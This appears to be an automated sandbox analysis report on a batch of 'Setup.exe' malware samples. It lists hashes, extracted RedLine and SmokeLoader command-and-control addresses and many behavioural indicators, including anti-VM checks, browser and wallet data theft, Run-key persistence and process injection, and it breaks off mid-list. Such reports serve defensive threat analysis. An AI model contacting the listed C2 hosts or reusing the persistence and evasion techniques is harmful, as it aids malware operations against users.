Overview
overview
10Static
static
Setup (1).exe
windows11_x64
10Setup (10).exe
windows11_x64
10Setup (11).exe
windows11_x64
10Setup (12).exe
windows11_x64
10Setup (13).exe
windows11_x64
10Setup (14).exe
windows11_x64
10Setup (15).exe
windows11_x64
10Setup (16).exe
windows11_x64
10Setup (17).exe
windows11_x64
10Setup (18).exe
windows11_x64
10Setup (19).exe
windows11_x64
10Setup (2).exe
windows11_x64
10Setup (20).exe
windows11_x64
10Setup (21).exe
windows11_x64
Setup (22).exe
windows11_x64
Setup (23).exe
windows11_x64
1Setup (24).exe
windows11_x64
10Setup (25).exe
windows11_x64
10Setup (26).exe
windows11_x64
10Setup (27).exe
windows11_x64
10Setup (28).exe
windows11_x64
10Setup (29).exe
windows11_x64
10Setup (3).exe
windows11_x64
10Setup (30).exe
windows11_x64
10Setup (31).exe
windows11_x64
10Setup (4).exe
windows11_x64
10Setup (5).exe
windows11_x64
10Setup (6).exe
windows11_x64
10Setup (7).exe
windows11_x64
10Setup (8).exe
windows11_x64
1Setup (9).exe
windows11_x64
10Setup.exe
windows11_x64
10Resubmissions
15/10/2024, 15:36
241015-s1zlzasdkc 1001/07/2024, 18:32
240701-w6yteawhmq 1001/07/2024, 14:52
240701-r82wmaxdnd 1001/07/2024, 14:52
240701-r8syqa1dpp 1011/03/2024, 21:22
240311-z8dsssgg58 1001/09/2021, 13:18
210901-5bmxjspa5s 1001/09/2021, 13:04
210901-te4btfspqa 1001/09/2021, 05:12
210901-4wnkwm1p3j 1031/08/2021, 21:47
210831-41rp97dma2 10Analysis
-
max time kernel
166s -
max time network
1810s -
platform
windows11_x64 -
resource
win11 -
submitted
21/08/2021, 19:20
Static task
static1
Behavioral task
behavioral1
Sample
Setup (1).exe
Resource
win11
Behavioral task
behavioral2
Sample
Setup (10).exe
Resource
win11
Behavioral task
behavioral3
Sample
Setup (11).exe
Resource
win11
Behavioral task
behavioral4
Sample
Setup (12).exe
Resource
win11
Behavioral task
behavioral5
Sample
Setup (13).exe
Resource
win11
Behavioral task
behavioral6
Sample
Setup (14).exe
Resource
win11
Behavioral task
behavioral7
Sample
Setup (15).exe
Resource
win11
Behavioral task
behavioral8
Sample
Setup (16).exe
Resource
win11
Behavioral task
behavioral9
Sample
Setup (17).exe
Resource
win11
Behavioral task
behavioral10
Sample
Setup (18).exe
Resource
win11
Behavioral task
behavioral11
Sample
Setup (19).exe
Resource
win11
Behavioral task
behavioral12
Sample
Setup (2).exe
Resource
win11
Behavioral task
behavioral13
Sample
Setup (20).exe
Resource
win11
Behavioral task
behavioral14
Sample
Setup (21).exe
Resource
win11
Behavioral task
behavioral15
Sample
Setup (22).exe
Resource
win11
Behavioral task
behavioral16
Sample
Setup (23).exe
Resource
win11
Behavioral task
behavioral17
Sample
Setup (24).exe
Resource
win11
Behavioral task
behavioral18
Sample
Setup (25).exe
Resource
win11
Behavioral task
behavioral19
Sample
Setup (26).exe
Resource
win11
Behavioral task
behavioral20
Sample
Setup (27).exe
Resource
win11
Behavioral task
behavioral21
Sample
Setup (28).exe
Resource
win11
Behavioral task
behavioral22
Sample
Setup (29).exe
Resource
win11
Behavioral task
behavioral23
Sample
Setup (3).exe
Resource
win11
Behavioral task
behavioral24
Sample
Setup (30).exe
Resource
win11
Behavioral task
behavioral25
Sample
Setup (31).exe
Resource
win11
Behavioral task
behavioral26
Sample
Setup (4).exe
Resource
win11
Behavioral task
behavioral27
Sample
Setup (5).exe
Resource
win11
Behavioral task
behavioral28
Sample
Setup (6).exe
Resource
win11
Behavioral task
behavioral29
Sample
Setup (7).exe
Resource
win11
Behavioral task
behavioral30
Sample
Setup (8).exe
Resource
win11
Behavioral task
behavioral31
Sample
Setup (9).exe
Resource
win11
Behavioral task
behavioral32
Sample
Setup.exe
Resource
win11
General
-
Target
Setup (4).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
redline
dibild
135.148.139.222:33569
Extracted
redline
3
deyrolorme.xyz:80
xariebelal.xyz:80
anihelardd.xyz:80
Extracted
smokeloader
2020
http://readinglistforaugust1.xyz/
http://readinglistforaugust2.xyz/
http://readinglistforaugust3.xyz/
http://readinglistforaugust4.xyz/
http://readinglistforaugust5.xyz/
http://readinglistforaugust6.xyz/
http://readinglistforaugust7.xyz/
http://readinglistforaugust8.xyz/
http://readinglistforaugust9.xyz/
http://readinglistforaugust10.xyz/
http://readinglistforaugust1.site/
http://readinglistforaugust2.site/
http://readinglistforaugust3.site/
http://readinglistforaugust4.site/
http://readinglistforaugust5.site/
http://readinglistforaugust6.site/
http://readinglistforaugust7.site/
http://readinglistforaugust8.site/
http://readinglistforaugust9.site/
http://readinglistforaugust10.site/
http://readinglistforaugust1.club/
http://readinglistforaugust2.club/
http://readinglistforaugust3.club/
http://readinglistforaugust4.club/
http://readinglistforaugust5.club/
http://readinglistforaugust6.club/
http://readinglistforaugust7.club/
http://readinglistforaugust8.club/
http://readinglistforaugust9.club/
http://readinglistforaugust10.club/
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 784 4780 rundll32.exe 15 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7952 4780 rundll32.exe 15 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
resource yara_rule behavioral26/memory/2396-245-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral26/memory/2396-241-0x0000000000000000-mapping.dmp family_redline behavioral26/memory/2144-271-0x0000000004FC0000-0x0000000004FF2000-memory.dmp family_redline behavioral26/memory/3664-302-0x0000000000000000-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral26/files/0x000200000002b20e-374.dat family_socelars behavioral26/files/0x000200000002b20e-375.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 16 IoCs
description pid Process procid_target PID 3080 created 4768 3080 WerFault.exe 92 PID 2748 created 1772 2748 WerFault.exe 120 PID 2996 created 1256 2996 3522455.exe 139 PID 5492 created 1556 5492 WerFault.exe 236 PID 6120 created 5132 6120 WerFault.exe 143 PID 5776 created 1128 5776 11111.exe 126 PID 4512 created 5584 4512 WerFault.exe 153 PID 4476 created 3252 4476 WerFault.exe 114 PID 4448 created 6240 4448 Process not Found 201 PID 6044 created 5548 6044 WerFault.exe 503 PID 6296 created 5796 6296 WerFault.exe 156 PID 1212 created 1504 1212 WerFault.exe 185 PID 1556 created 3096 1556 WerFault.exe 183 PID 6024 created 5128 6024 WerFault.exe 277 PID 6340 created 1140 6340 explorer.exe 180 PID 5460 created 4576 5460 WerFault.exe 187 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
resource yara_rule behavioral26/memory/1256-368-0x00000000048E0000-0x000000000497D000-memory.dmp family_vidar -
Blocklisted process makes network request 2 IoCs
flow pid Process 247 5476 cmd.exe 263 5612 cmd.exe -
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
pid Process 2996 PmTP4Y8Tuo4gwoc1en2P5_xO.exe 4736 4AUn3qVoixfOGekao_r0NAwL.exe 3036 YqohxejQlzsSn85h6wVwNmgs.exe 4412 GgTQxtl3PTEZ6PgzZcNkECEA.exe 4768 YyV4Yax0aIoKEERtyzGOKfqG.exe 1196 B7WfuuZSoR13KQCCucqxjVZN.exe 576 EM376mw_WWT6k_K2WmjB6Hlp.exe 2532 Conhost.exe 1564 B7WfuuZSoR13KQCCucqxjVZN.exe 1644 LJ8xS7eMHEfn5YzFm3EG4doJ.exe 1556 8988571.exe 1532 LJ8xS7eMHEfn5YzFm3EG4doJ.tmp 5056 7566872.exe 2144 5978978.exe 3252 6982593.exe 2352 YqohxejQlzsSn85h6wVwNmgs.exe 2396 PmTP4Y8Tuo4gwoc1en2P5_xO.exe 664 WinHoster.exe 3664 YqohxejQlzsSn85h6wVwNmgs.exe 3172 Setup.exe 1256 LGCH2-401_2021-08-18_14-40.exe 3088 Inlog.exe 932 Cleaner Installation.exe 2504 WEATHER Manager.exe 3644 VPN.exe 4648 Inlog.tmp 2668 md7_7dfj.exe 3964 WEATHER Manager.tmp 3236 VPN.tmp 1128 askinstall53.exe 1468 MediaBurner2.exe 4476 WerFault.exe 3916 zhaoy-game.exe 1496 MediaBurner2.tmp 4560 LivelyScreenRecS1.9.exe 736 xtect12.exe 5132 zhaoy-game.exe 5204 1932722.exe 5256 3377047_logo_media.exe 5316 1322028.exe 5404 msedge.exe 5476 cmd.exe 5548 11111.exe 5584 rDFuThgN6SXD3BHEaNB1t36C.exe 5612 cmd.exe 5688 3529569.exe 5780 vzi95zy8ZZnzYbaMPGMwbR9c.exe 5796 DSbpoF6PGCusnRFF00jXGCvc.exe 5804 6qOZJwofMnPFV3X6H7S9RpsB.exe 5788 TRwbhfZmDvsoQBUYytGmOFVr.exe 5128 mshta.exe 3820 w60Mqs3_BabitQSCHh7KQrkG.exe 5908 1307511.exe 4552 tmpCF0D_tmp.exe 5684 eB4B9a3r3M8RbrEnRvE5DYlL.exe 1504 1u1Bo7ciQh9CC9mtFsea8VmB.exe 5568 tqPX35QmNG9xJkcyhLuu4VPq.exe 4576 p4SbTWyRkGxXw6NWI5i0MqoY.exe 3484 BmG2DQfIMoE6pybE9bVYwjhf.exe 3096 KpxmZ28B_MMHfNWS6a3Q9Eyq.exe 2372 BE7dgnBwWbYWSbgH5D2WlRlA.exe 1140 CELl_sALPqvaSOQmhahq6lzx.exe 4232 rKZQiSfEjVrmrMwu_VTY2nfp.exe 5776 11111.exe -
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion BE7dgnBwWbYWSbgH5D2WlRlA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion GgTQxtl3PTEZ6PgzZcNkECEA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion BE7dgnBwWbYWSbgH5D2WlRlA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion GgTQxtl3PTEZ6PgzZcNkECEA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6qOZJwofMnPFV3X6H7S9RpsB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion eB4B9a3r3M8RbrEnRvE5DYlL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6qOZJwofMnPFV3X6H7S9RpsB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion eB4B9a3r3M8RbrEnRvE5DYlL.exe -
Loads dropped DLL 24 IoCs
pid Process 1532 LJ8xS7eMHEfn5YzFm3EG4doJ.tmp 1532 LJ8xS7eMHEfn5YzFm3EG4doJ.tmp 1772 rundll32.exe 4648 Inlog.tmp 4648 Inlog.tmp 932 Cleaner Installation.exe 3236 VPN.tmp 3236 VPN.tmp 3964 WEATHER Manager.tmp 3964 WEATHER Manager.tmp 1496 MediaBurner2.tmp 6268 mpcmdrun.exe 6032 FONA0AWbmkXuPgsAljdsGTUp.tmp 6032 FONA0AWbmkXuPgsAljdsGTUp.tmp 4600 MsiExec.exe 3588 Setup.tmp 3588 Setup.tmp 4600 MsiExec.exe 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp 3588 Setup.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral26/files/0x000200000002b1cb-157.dat themida behavioral26/files/0x000200000002b1cb-162.dat themida behavioral26/memory/4412-181-0x0000000000C30000-0x0000000000C31000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 7566872.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA GgTQxtl3PTEZ6PgzZcNkECEA.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6qOZJwofMnPFV3X6H7S9RpsB.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cmd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA BE7dgnBwWbYWSbgH5D2WlRlA.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA eB4B9a3r3M8RbrEnRvE5DYlL.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md7_7dfj.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\J: Cleaner Installation.exe File opened (read-only) \??\N: Cleaner Installation.exe File opened (read-only) \??\W: Cleaner Installation.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\M: Cleaner Installation.exe File opened (read-only) \??\O: Cleaner Installation.exe File opened (read-only) \??\P: Cleaner Installation.exe File opened (read-only) \??\T: Cleaner Installation.exe File opened (read-only) \??\B: Cleaner Installation.exe File opened (read-only) \??\G: Cleaner Installation.exe File opened (read-only) \??\K: Cleaner Installation.exe File opened (read-only) \??\L: Cleaner Installation.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\U: Cleaner Installation.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\A: Cleaner Installation.exe File opened (read-only) \??\Q: Cleaner Installation.exe File opened (read-only) \??\R: Cleaner Installation.exe File opened (read-only) \??\Y: Cleaner Installation.exe File opened (read-only) \??\I: Cleaner Installation.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\V: Cleaner Installation.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\X: Cleaner Installation.exe File opened (read-only) \??\Z: Cleaner Installation.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\E: Cleaner Installation.exe File opened (read-only) \??\F: Cleaner Installation.exe File opened (read-only) \??\H: Cleaner Installation.exe File opened (read-only) \??\S: Cleaner Installation.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 11 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 46 ipinfo.io 72 ipinfo.io 87 ipinfo.io 90 ipinfo.io 93 ipinfo.io 227 ipinfo.io 227 ip-api.com 39 ipinfo.io 160 ipinfo.io 236 ipinfo.io 6 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 4412 GgTQxtl3PTEZ6PgzZcNkECEA.exe 5476 cmd.exe 5804 6qOZJwofMnPFV3X6H7S9RpsB.exe 5612 cmd.exe 2372 BE7dgnBwWbYWSbgH5D2WlRlA.exe 5684 eB4B9a3r3M8RbrEnRvE5DYlL.exe 6224 Conhost.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 1196 set thread context of 1564 1196 B7WfuuZSoR13KQCCucqxjVZN.exe 106 PID 2996 set thread context of 2396 2996 3522455.exe 103 PID 3036 set thread context of 3664 3036 YqohxejQlzsSn85h6wVwNmgs.exe 116 PID 5920 set thread context of 3788 5920 ZfPC1NVhIXjAVHU_mR4CuAoE.exe 230 PID 3484 set thread context of 5544 3484 BmG2DQfIMoE6pybE9bVYwjhf.exe 237 PID 6216 set thread context of 232 6216 RuaBdkMsqlVweMJSC65kAAYk.exe 232 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.ini rKZQiSfEjVrmrMwu_VTY2nfp.exe File created C:\Program Files (x86)\MaskVPN\is-3BTCV.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-BREL9.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\customer3.exe vzi95zy8ZZnzYbaMPGMwbR9c.exe File created C:\Program Files (x86)\MaskVPN\is-00RKM.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-5DNFJ.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\customer3.exe rKZQiSfEjVrmrMwu_VTY2nfp.exe File opened for modification C:\Program Files (x86)\MaskVPN\libMaskVPN.dll Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-CE40J.tmp Setup.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe rKZQiSfEjVrmrMwu_VTY2nfp.exe File opened for modification C:\Program Files (x86)\MaskVPN\libeay32.dll Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\mask_svc.exe Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-TRIHR.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-JTQGD.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-NKJUU.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-QAUAQ.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-V3F4G.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe Setup.exe File created C:\Program Files (x86)\MaskVPN\is-NPI3C.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-RU0FM.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe rKZQiSfEjVrmrMwu_VTY2nfp.exe File created C:\Program Files (x86)\MaskVPN\unins000.dat Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-6O5EE.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-QNDM9.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-GMMKT.tmp Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\ssleay32.dll Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-HKGJ7.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-5KAOF.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe Setup.exe File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.dll Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-E8G4C.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-49QLC.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-9T5QC.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe Setup.exe File opened for modification C:\Program Files (x86)\MaskVPN\libCommon.dll Setup.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-MDFHR.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-K0UOS.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe Setup.exe File opened for modification C:\Program Files (x86)\MaskVPN\polstore.dll Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-9KSV8.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-PEKMV.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-GQFA2.tmp Setup.tmp File created C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.ini Setup.exe File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPN.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-MMSKT.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-T6139.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-LF4J2.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-EAA1G.tmp Setup.tmp File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe Setup.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe Setup.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe vzi95zy8ZZnzYbaMPGMwbR9c.exe File opened for modification C:\Program Files (x86)\MaskVPN\ipseccmd.exe Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-MGP9O.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\is-H8LSJ.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-FNB3K.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\unins000.msg Setup.tmp -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 27 IoCs
pid pid_target Process procid_target 1424 4768 WerFault.exe 92 2740 1256 WerFault.exe 2380 1772 WerFault.exe 120 5556 1556 WerFault.exe 110 2148 1556 WerFault.exe 110 1540 1128 WerFault.exe 126 6184 5584 WerFault.exe 153 4136 6240 WerFault.exe 201 6884 3252 WerFault.exe 114 1436 5548 WerFault.exe 154 1580 5796 WerFault.exe 156 2568 3096 WerFault.exe 183 5792 5128 WerFault.exe 167 5280 1140 WerFault.exe 180 4984 4576 WerFault.exe 187 7424 5204 WerFault.exe 144 7260 6896 WerFault.exe 275 5400 8020 WerFault.exe 303 7984 4168 WerFault.exe 280 6256 7016 WerFault.exe 252 7368 2996 WerFault.exe 260 2716 8088 WerFault.exe 354 7860 4384 WerFault.exe 346 7996 5908 WerFault.exe 171 7300 6460 WerFault.exe 376 3532 6220 WerFault.exe 416 7724 1976 WerFault.exe 429 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI B7WfuuZSoR13KQCCucqxjVZN.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI B7WfuuZSoR13KQCCucqxjVZN.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI B7WfuuZSoR13KQCCucqxjVZN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI BmG2DQfIMoE6pybE9bVYwjhf.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI BmG2DQfIMoE6pybE9bVYwjhf.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI BmG2DQfIMoE6pybE9bVYwjhf.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried 